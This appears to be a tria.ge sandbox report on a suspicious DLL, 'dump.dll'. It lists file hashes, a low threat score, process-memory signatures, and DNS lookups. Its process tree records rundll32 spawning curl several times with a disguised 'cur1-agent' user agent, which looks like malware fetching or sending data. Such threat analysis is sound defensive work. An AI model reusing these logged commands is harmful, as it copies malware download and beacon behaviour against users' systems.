Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
141s -
max time network
108s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21/03/2023, 14:11 UTC
Static task
static1
Behavioral task
behavioral1
Sample
dump.dll
Resource
win7-20230220-en
0 signatures
150 seconds
Behavioral task
behavioral2
Sample
dump.dll
Resource
win10v2004-20230220-en
2 signatures
150 seconds
General
-
Target
dump.dll
-
Size
178KB
-
MD5
529c65521e8a07c8810b6d225f7e2a89
-
SHA1
d03ee28dc71232ba9895dd5f017ecfbd18a621ce
-
SHA256
ba186a1a97d4f647dad39cb3ccae5466bb8d5463ceedf470428484416265ef5f
-
SHA512
15185e2b075c6dddc73441081405cfbd4c009ef229d037c5cf06792d5d1d8d802546aba0ce81345ed349d3b8a86393b1488420f364661de62b536aa56e68c74c
-
SSDEEP
3072:7Qb8KGhaCX8bYS3oAlob7UgS0VRilFxfiHNSXMJiB5CnPBRalGsQjxncIpoa1cT9:fQp4lBZFoaZLU9o0GVmA+P
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 232 rundll32.exe 232 rundll32.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 232 wrote to memory of 208 232 rundll32.exe 84 PID 232 wrote to memory of 208 232 rundll32.exe 84 PID 232 wrote to memory of 2548 232 rundll32.exe 93 PID 232 wrote to memory of 2548 232 rundll32.exe 93 PID 232 wrote to memory of 852 232 rundll32.exe 96 PID 232 wrote to memory of 852 232 rundll32.exe 96 PID 232 wrote to memory of 3764 232 rundll32.exe 99 PID 232 wrote to memory of 3764 232 rundll32.exe 99 PID 232 wrote to memory of 1052 232 rundll32.exe 108 PID 232 wrote to memory of 1052 232 rundll32.exe 108
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\dump.dll,#11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:232 -
C:\Windows\system32\curl.execurl -A cur1-agent -L -s -d dl2⤵PID:208
-
-
C:\Windows\system32\curl.execurl -A cur1-agent -L -s -d dl2⤵PID:2548
-
-
C:\Windows\system32\curl.execurl -A cur1-agent -L -s -d dl2⤵PID:852
-
-
C:\Windows\system32\curl.execurl -A cur1-agent -L -s -d dl2⤵PID:3764
-
-
C:\Windows\system32\curl.execurl -A cur1-agent -L -s -d dl2⤵PID:1052
-
Network
-
Remote address:8.8.8.8:53Request228.249.119.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request154.25.221.88.in-addr.arpaIN PTRResponse154.25.221.88.in-addr.arpaIN PTRa88-221-25-154deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request36.146.190.20.in-addr.arpaIN PTRResponse36.146.190.20.in-addr.arpaIN CNAME36.0-26.146.190.20.in-addr.arpa
-
Remote address:8.8.8.8:53Request123.108.74.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request164.2.77.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request233.141.123.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request2.36.159.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request176.122.125.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request216.74.101.95.in-addr.arpaIN PTRResponse216.74.101.95.in-addr.arpaIN PTRa95-101-74-216deploystaticakamaitechnologiescom
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
73 B 159 B 1 1
DNS Request
228.249.119.40.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
154.25.221.88.in-addr.arpa
-
72 B 168 B 1 1
DNS Request
36.146.190.20.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
123.108.74.40.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
164.2.77.40.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
233.141.123.20.in-addr.arpa
-
71 B 133 B 1 1
DNS Request
2.36.159.162.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
176.122.125.40.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
216.74.101.95.in-addr.arpa